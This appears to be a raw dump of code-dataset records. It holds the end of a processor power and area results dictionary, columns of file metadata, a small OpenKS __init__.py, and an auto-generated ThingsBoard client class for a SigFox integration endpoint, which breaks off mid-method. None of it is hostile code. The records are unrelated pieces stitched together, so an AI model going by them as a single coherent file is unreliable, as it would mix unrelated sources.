'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.290615,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.58123,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591622,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283406,
'Memory Management Unit/Area': 0.434579,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.10314,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.103803,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00813591,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.346373,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0348163,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.683182,
'Memory Management Unit/Runtime Dynamic': 0.138619,
'Memory Management Unit/Subthreshold Leakage': 0.0769113,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0399462,
'Peak Dynamic': 24.9384,
'Renaming Unit/Area': 0.369768,
'Renaming Unit/FP Front End RAT/Area': 0.168486,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00489731,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 3.33511,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.271649,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0437281,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.024925,
'Renaming Unit/Free List/Area': 0.0414755,
'Renaming Unit/Free List/Gate Leakage': 4.15911e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0401324,
'Renaming Unit/Free List/Runtime Dynamic': 0.020645,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000670426,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000377987,
'Renaming Unit/Gate Leakage': 0.00863632,
'Renaming Unit/Int Front End RAT/Area': 0.114751,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.00038343,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.86945,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.172697,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00611897,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00348781,
'Renaming Unit/Peak Dynamic': 4.56169,
'Renaming Unit/Runtime Dynamic': 0.464991,
'Renaming Unit/Subthreshold Leakage': 0.070483,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0362779,
'Runtime Dynamic': 6.99436,
'Subthreshold Leakage': 6.21877,
'Subthreshold Leakage with power gating': 2.58311}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 0.022871199952331348,
'Runtime Dynamic': 0.022871199952331348,
'Subthreshold Leakage': 8.504,
'Subthreshold Leakage with power gating': 8.504},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.026291,
'Runtime Dynamic': 0.0159925,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364},
{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.0256158,
'Runtime Dynamic': 0.0152321,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 388.384,
'Gate Leakage': 3.09074,
'Peak Dynamic': 199.133,
'Peak Power': 265.679,
'Runtime Dynamic': 55.679,
'Subthreshold Leakage': 63.4555,
'Subthreshold Leakage with power gating': 28.0572,
'Total Cores/Area': 260.865,
'Total Cores/Gate Leakage': 2.98397,
'Total Cores/Peak Dynamic': 198.864,
'Total Cores/Runtime Dynamic': 55.6196,
'Total Cores/Subthreshold Leakage': 49.7502,
'Total Cores/Subthreshold Leakage with power gating': 20.6649,
'Total L3s/Area': 123.815,
'Total L3s/Gate Leakage': 0.0968273,
'Total L3s/Peak Dynamic': 0.0519068,
'Total L3s/Runtime Dynamic': 0.0312246,
'Total L3s/Subthreshold Leakage': 13.6017,
'Total L3s/Subthreshold Leakage with power gating': 6.64728,
'Total Leakage': 66.5462,
'Total NoCs/Area': 3.70399,
'Total NoCs/Gate Leakage': 0.00993673,
'Total NoCs/Peak Dynamic': 0.216542,
'Total NoCs/Runtime Dynamic': 0.0281445,
'Total NoCs/Subthreshold Leakage': 0.103619,
'Total NoCs/Subthreshold Leakage with power gating': 0.0388573}} | 75.692825 | 124 | 0.684136 | 15,928 | 135,036 | 5.794011 | 0.044576 | 0.122292 | 0.114426 | 0.094661 | 0.961143 | 0.959669 | 0.951174 | 0.925851 | 0.910161 | 0.904439 | 0 | 0.130598 | 0.222755 | 135,036 | 1,784 | 125 | 75.692825 | 0.748695 | 0 | 0 | 0.723094 | 0 | 0 | 0.660811 | 0.048875 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
92213088c2ff56c7d8ae6f9ffd14590d7ceda74e | 120 | py | Python | openks/models/pytorch/ke_modules/nero_modules/__init__.py | zhengkangjie/OpenKS | 4e010c3d3cc6acec3968fd92e21a473e02e76f70 | [
"Apache-2.0"
] | 1 | 2021-03-12T02:41:05.000Z | 2021-03-12T02:41:05.000Z | openks/models/pytorch/ke_modules/nero_modules/__init__.py | zhengkangjie/OpenKS | 4e010c3d3cc6acec3968fd92e21a473e02e76f70 | [
"Apache-2.0"
] | null | null | null | openks/models/pytorch/ke_modules/nero_modules/__init__.py | zhengkangjie/OpenKS | 4e010c3d3cc6acec3968fd92e21a473e02e76f70 | [
"Apache-2.0"
] | 1 | 2021-02-08T11:08:26.000Z | 2021-02-08T11:08:26.000Z | from .main import *
from .models.soft_match_bert import *
from .models.pat_match import *
from . import semeval_constant | 30 | 37 | 0.8 | 18 | 120 | 5.111111 | 0.555556 | 0.326087 | 0.347826 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.125 | 120 | 4 | 38 | 30 | 0.87619 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9230e5b177de103567c3aea96cef7fe8ece15cbd | 34,977 | py | Python | tb_rest_client/api/api_pe/sig_fox_integration_controller_api.py | maksonlee/python_tb_rest_client | a6cd17ef4de31f68c3226b7a9835292fbac4b1fa | [
"Apache-2.0"
] | 1 | 2021-07-19T10:09:04.000Z | 2021-07-19T10:09:04.000Z | tb_rest_client/api/api_pe/sig_fox_integration_controller_api.py | moravcik94/python_tb_rest_client | 985361890cdf4ccce93d2b24905ad9003c8dfcaa | [
"Apache-2.0"
] | null | null | null | tb_rest_client/api/api_pe/sig_fox_integration_controller_api.py | moravcik94/python_tb_rest_client | 985361890cdf4ccce93d2b24905ad9003c8dfcaa | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
# Copyright 2020. ThingsBoard
# #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# #
# http://www.apache.org/licenses/LICENSE-2.0
# #
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from tb_rest_client.api_client import ApiClient
class SigFoxIntegrationControllerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
def process_request_using_delete1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_delete1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_delete1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_delete1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_delete1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_delete1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_delete1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_delete1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_delete1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_get1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_get1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_get1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_get1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_get1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_get1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_get1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_get1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_get1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_head1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_head1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_head1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_head1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_head1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_head1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_head1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_head1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_head1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'HEAD',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_options1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_options1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_options1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_options1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_options1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_options1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_options1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_options1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_options1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'OPTIONS',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_patch1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_patch1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_patch1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_patch1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_patch1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_patch1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_patch1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_patch1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_patch1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'PATCH',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_post5(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_post5(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_post5_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_post5_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_post5_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_post5_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_post5`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_post5`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_post5`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def process_request_using_put1(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_put1(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.process_request_using_put1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
else:
(data) = self.process_request_using_put1_with_http_info(routing_key, msg, request_headers, **kwargs) # noqa: E501
return data
def process_request_using_put1_with_http_info(self, routing_key, msg, request_headers, **kwargs): # noqa: E501
"""processRequest # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api_pe.process_request_using_put1_with_http_info(routing_key, msg, request_headers, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str routing_key: routingKey (required)
:param str msg: msg (required)
:param object request_headers: requestHeaders (required)
:return: DeferredResultResponseEntity
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['routing_key', 'msg', 'request_headers'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
params[key] = val
del params['kwargs']
# verify the required parameter 'routing_key' is set
if ('routing_key' not in params or
params['routing_key'] is None):
raise ValueError("Missing the required parameter `routing_key` when calling `process_request_using_put1`") # noqa: E501
# verify the required parameter 'msg' is set
if ('msg' not in params or
params['msg'] is None):
raise ValueError("Missing the required parameter `msg` when calling `process_request_using_put1`") # noqa: E501
# verify the required parameter 'request_headers' is set
if ('request_headers' not in params or
params['request_headers'] is None):
raise ValueError("Missing the required parameter `request_headers` when calling `process_request_using_put1`") # noqa: E501
collection_formats = {}
path_params = {}
if 'routing_key' in params:
path_params['routingKey'] = params['routing_key'] # noqa: E501
query_params = []
header_params = {}
if 'request_headers' in params:
header_params['requestHeaders'] = params['request_headers'] # noqa: E501
form_params = []
local_var_files = {}
body_params = None
if 'msg' in params:
body_params = params['msg']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['*/*']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['X-Authorization'] # noqa: E501
return self.api_client.call_api(
'/api/v1/integrations/sigfox/{routingKey}', 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='DeferredResultResponseEntity', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
